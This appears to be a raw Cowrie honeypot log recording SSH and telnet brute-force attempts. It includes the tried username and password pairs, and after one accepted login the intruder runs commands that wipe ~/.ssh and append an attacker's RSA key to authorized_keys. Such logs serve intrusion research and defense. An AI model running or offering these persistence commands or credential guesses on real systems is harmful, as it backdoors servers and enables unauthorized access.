{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00030\\x98\\xfdv\\x97\\:\u001aK\\\\xb7\u0014!\\xafE\\xb6 }\u0000\\xd9\u001cJ\\x9e\\xf1B1[\\x8dK\\xc1\\xae\\xa1\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00030\\x98\\xfdv\\x97\\:\u001aK\\\\xb7\u0014!\\xafE\\xb6 }\u0000\\xd9\u001cJ\\x9e\\xf1B1[\\x8dK\\xc1\\xae\\xa1\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-09T02:37:10.150226Z","src_ip":"212.227.125.160","session":"38afbe4230ee"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:10.150917Z","src_ip":"212.227.125.160","session":"38afbe4230ee"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:11.069269Z","src_ip":"212.227.235.229","session":"a7e9cb4900dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60466,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0c27f42a9bf","protocol":"ssh","message":"New connection: 212.227.235.229:60466 (1.2.3.4:22) [session: f0c27f42a9bf]","sensor":"my-vps","timestamp":"2025-09-09T02:37:11.322372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:11.323026Z","src_ip":"212.227.235.229","session":"f0c27f42a9bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:11.576551Z","src_ip":"212.227.235.229","session":"f0c27f42a9bf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:37:12.631987Z","src_ip":"212.227.235.229","session":"f0c27f42a9bf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:12.886991Z","src_ip":"212.227.235.229","session":"f0c27f42a9bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59530,"dst_ip":"1.2.3.4","dst_port":23,"session":"73066f30b468","protocol":"telnet","message":"New connection: 212.227.125.160:59530 (1.2.3.4:23) [session: 73066f30b468]","sensor":"my-vps","timestamp":"2025-09-09T02:37:12.911653Z"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:12.928768Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.closed","duration":13.715558767318726,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:13.240239Z","src_ip":"212.227.235.229","session":"683b375694fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34909,"dst_ip":"1.2.3.4","dst_port":23,"session":"175ed3877bf2","protocol":"telnet","message":"New connection: 212.227.235.229:34909 (1.2.3.4:23) [session: 175ed3877bf2]","sensor":"my-vps","timestamp":"2025-09-09T02:37:13.429217Z"}
{"eventid":"cowrie.session.closed","duration":12.850702047348022,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:16.727387Z","src_ip":"212.227.235.229","session":"fd7bfaa3047b"}
{"eventid":"cowrie.session.closed","duration":13.738561868667603,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:17.067816Z","src_ip":"212.227.235.229","session":"ee512513cd10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34938,"dst_ip":"1.2.3.4","dst_port":23,"session":"02729fb36aad","protocol":"telnet","message":"New connection: 212.227.235.229:34938 (1.2.3.4:23) [session: 02729fb36aad]","sensor":"my-vps","timestamp":"2025-09-09T02:37:17.106821Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34946,"dst_ip":"1.2.3.4","dst_port":23,"session":"b045511432db","protocol":"telnet","message":"New connection: 212.227.235.229:34946 (1.2.3.4:23) [session: b045511432db]","sensor":"my-vps","timestamp":"2025-09-09T02:37:17.321468Z"}
{"eventid":"cowrie.session.closed","duration":12.915389060974121,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:18.875448Z","src_ip":"212.227.235.229","session":"fdc46c6361d7"}
{"eventid":"cowrie.session.closed","duration":13.870493412017822,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:19.152331Z","src_ip":"212.227.235.229","session":"53711809cc18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34955,"dst_ip":"1.2.3.4","dst_port":23,"session":"da7b9f546c31","protocol":"telnet","message":"New connection: 212.227.235.229:34955 (1.2.3.4:23) [session: da7b9f546c31]","sensor":"my-vps","timestamp":"2025-09-09T02:37:19.164445Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34958,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a1bc209f5fd","protocol":"telnet","message":"New connection: 212.227.235.229:34958 (1.2.3.4:23) [session: 6a1bc209f5fd]","sensor":"my-vps","timestamp":"2025-09-09T02:37:19.391819Z"}
{"eventid":"cowrie.session.closed","duration":13.963100910186768,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:23.006705Z","src_ip":"212.227.235.229","session":"0757cd121303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35013,"dst_ip":"1.2.3.4","dst_port":23,"session":"87b99a98faa6","protocol":"telnet","message":"New connection: 212.227.235.229:35013 (1.2.3.4:23) [session: 87b99a98faa6]","sensor":"my-vps","timestamp":"2025-09-09T02:37:23.393233Z"}
{"eventid":"cowrie.session.closed","duration":13.133225202560425,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:26.044827Z","src_ip":"212.227.125.160","session":"73066f30b468"}
{"eventid":"cowrie.session.closed","duration":13.661272525787354,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:27.090424Z","src_ip":"212.227.235.229","session":"175ed3877bf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35125,"dst_ip":"1.2.3.4","dst_port":23,"session":"938f9d6221a1","protocol":"telnet","message":"New connection: 212.227.235.229:35125 (1.2.3.4:23) [session: 938f9d6221a1]","sensor":"my-vps","timestamp":"2025-09-09T02:37:27.348205Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48106,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a10997649ed","protocol":"ssh","message":"New connection: 212.227.235.229:48106 (1.2.3.4:22) [session: 5a10997649ed]","sensor":"my-vps","timestamp":"2025-09-09T02:37:27.857650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:27.863871Z","src_ip":"212.227.235.229","session":"5a10997649ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:28.239028Z","src_ip":"212.227.235.229","session":"5a10997649ed"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser1234","message":"login attempt [appuser/appuser1234] failed","sensor":"my-vps","timestamp":"2025-09-09T02:37:29.754290Z","src_ip":"212.227.235.229","session":"5a10997649ed"}
{"eventid":"cowrie.session.closed","duration":12.978952884674072,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:30.085714Z","src_ip":"212.227.235.229","session":"02729fb36aad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35138,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d00f16147cf","protocol":"telnet","message":"New connection: 212.227.235.229:35138 (1.2.3.4:23) [session: 1d00f16147cf]","sensor":"my-vps","timestamp":"2025-09-09T02:37:30.254908Z"}
{"eventid":"cowrie.session.closed","duration":13.511308193206787,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:30.831849Z","src_ip":"212.227.235.229","session":"b045511432db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35148,"dst_ip":"1.2.3.4","dst_port":23,"session":"a1038e28521e","protocol":"telnet","message":"New connection: 212.227.235.229:35148 (1.2.3.4:23) [session: a1038e28521e]","sensor":"my-vps","timestamp":"2025-09-09T02:37:31.122034Z"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:31.145086Z","src_ip":"212.227.235.229","session":"5a10997649ed"}
{"eventid":"cowrie.session.closed","duration":13.722457647323608,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:32.886858Z","src_ip":"212.227.235.229","session":"da7b9f546c31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35165,"dst_ip":"1.2.3.4","dst_port":23,"session":"4180311109b1","protocol":"telnet","message":"New connection: 212.227.235.229:35165 (1.2.3.4:23) [session: 4180311109b1]","sensor":"my-vps","timestamp":"2025-09-09T02:37:33.148156Z"}
{"eventid":"cowrie.session.closed","duration":13.757532596588135,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:33.149279Z","src_ip":"212.227.235.229","session":"6a1bc209f5fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35173,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ff9c3b9e603","protocol":"telnet","message":"New connection: 212.227.235.229:35173 (1.2.3.4:23) [session: 6ff9c3b9e603]","sensor":"my-vps","timestamp":"2025-09-09T02:37:33.388619Z"}
{"eventid":"cowrie.session.closed","duration":13.35315203666687,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:36.746304Z","src_ip":"212.227.235.229","session":"87b99a98faa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35306,"dst_ip":"1.2.3.4","dst_port":23,"session":"8bd8236be8c0","protocol":"telnet","message":"New connection: 212.227.235.229:35306 (1.2.3.4:23) [session: 8bd8236be8c0]","sensor":"my-vps","timestamp":"2025-09-09T02:37:36.920549Z"}
{"eventid":"cowrie.session.closed","duration":13.46675419807434,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:40.814893Z","src_ip":"212.227.235.229","session":"938f9d6221a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35333,"dst_ip":"1.2.3.4","dst_port":23,"session":"73eec0a82b09","protocol":"telnet","message":"New connection: 212.227.235.229:35333 (1.2.3.4:23) [session: 73eec0a82b09]","sensor":"my-vps","timestamp":"2025-09-09T02:37:41.100516Z"}
{"eventid":"cowrie.session.closed","duration":13.834484100341797,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:44.089324Z","src_ip":"212.227.235.229","session":"1d00f16147cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35471,"dst_ip":"1.2.3.4","dst_port":23,"session":"a43c14b8f864","protocol":"telnet","message":"New connection: 212.227.235.229:35471 (1.2.3.4:23) [session: a43c14b8f864]","sensor":"my-vps","timestamp":"2025-09-09T02:37:44.376100Z"}
{"eventid":"cowrie.session.closed","duration":13.845563173294067,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:44.967531Z","src_ip":"212.227.235.229","session":"a1038e28521e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35480,"dst_ip":"1.2.3.4","dst_port":23,"session":"242e00fdc4e9","protocol":"telnet","message":"New connection: 212.227.235.229:35480 (1.2.3.4:23) [session: 242e00fdc4e9]","sensor":"my-vps","timestamp":"2025-09-09T02:37:45.195220Z"}
{"eventid":"cowrie.session.closed","duration":13.557564973831177,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:46.704823Z","src_ip":"212.227.235.229","session":"4180311109b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35484,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b4afde1c43c","protocol":"telnet","message":"New connection: 212.227.235.229:35484 (1.2.3.4:23) [session: 6b4afde1c43c]","sensor":"my-vps","timestamp":"2025-09-09T02:37:46.950177Z"}
{"eventid":"cowrie.session.closed","duration":13.585124492645264,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:46.973657Z","src_ip":"212.227.235.229","session":"6ff9c3b9e603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35486,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdd62e4198de","protocol":"telnet","message":"New connection: 212.227.235.229:35486 (1.2.3.4:23) [session: fdd62e4198de]","sensor":"my-vps","timestamp":"2025-09-09T02:37:47.283270Z"}
{"eventid":"cowrie.session.closed","duration":13.235366582870483,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:50.155851Z","src_ip":"212.227.235.229","session":"8bd8236be8c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35509,"dst_ip":"1.2.3.4","dst_port":23,"session":"524f96c04028","protocol":"telnet","message":"New connection: 212.227.235.229:35509 (1.2.3.4:23) [session: 524f96c04028]","sensor":"my-vps","timestamp":"2025-09-09T02:37:50.405342Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38346,"dst_ip":"1.2.3.4","dst_port":22,"session":"89c84a095b5b","protocol":"ssh","message":"New connection: 212.227.235.229:38346 (1.2.3.4:22) [session: 89c84a095b5b]","sensor":"my-vps","timestamp":"2025-09-09T02:37:53.304560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:53.305693Z","src_ip":"212.227.235.229","session":"89c84a095b5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:53.567775Z","src_ip":"212.227.235.229","session":"89c84a095b5b"}
{"eventid":"cowrie.login.failed","username":"tester","password":"password123","message":"login attempt [tester/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:37:54.656036Z","src_ip":"212.227.235.229","session":"89c84a095b5b"}
{"eventid":"cowrie.session.closed","duration":13.645648002624512,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:54.746089Z","src_ip":"212.227.235.229","session":"73eec0a82b09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35663,"dst_ip":"1.2.3.4","dst_port":23,"session":"609b2d7c3a04","protocol":"telnet","message":"New connection: 212.227.235.229:35663 (1.2.3.4:23) [session: 609b2d7c3a04]","sensor":"my-vps","timestamp":"2025-09-09T02:37:54.982015Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:55.918450Z","src_ip":"212.227.235.229","session":"89c84a095b5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53310,"dst_ip":"1.2.3.4","dst_port":22,"session":"c235cfaf4475","protocol":"ssh","message":"New connection: 212.227.235.229:53310 (1.2.3.4:22) [session: c235cfaf4475]","sensor":"my-vps","timestamp":"2025-09-09T02:37:57.549920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:57.559346Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:57.806534Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.closed","duration":13.829228639602661,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:58.205258Z","src_ip":"212.227.235.229","session":"a43c14b8f864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35682,"dst_ip":"1.2.3.4","dst_port":23,"session":"f23a0e8c61b9","protocol":"telnet","message":"New connection: 212.227.235.229:35682 (1.2.3.4:23) [session: f23a0e8c61b9]","sensor":"my-vps","timestamp":"2025-09-09T02:37:58.442064Z"}
{"eventid":"cowrie.login.success","username":"root","password":"test1234!","message":"login attempt [root/test1234!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:37:58.807383Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.closed","duration":13.971476793289185,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:59.166602Z","src_ip":"212.227.235.229","session":"242e00fdc4e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:37:59.369099Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:37:59.369754Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:37:59.370786Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35689,"dst_ip":"1.2.3.4","dst_port":23,"session":"b74243f8719a","protocol":"telnet","message":"New connection: 212.227.235.229:35689 (1.2.3.4:23) [session: b74243f8719a]","sensor":"my-vps","timestamp":"2025-09-09T02:37:59.448829Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:59.628419Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:38:00.149400Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.150108Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.403007Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.403921Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53933,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5ceaf600ff3","protocol":"ssh","message":"New connection: 212.227.235.229:53933 (1.2.3.4:22) [session: e5ceaf600ff3]","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.644087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.650477Z","src_ip":"212.227.235.229","session":"e5ceaf600ff3"}
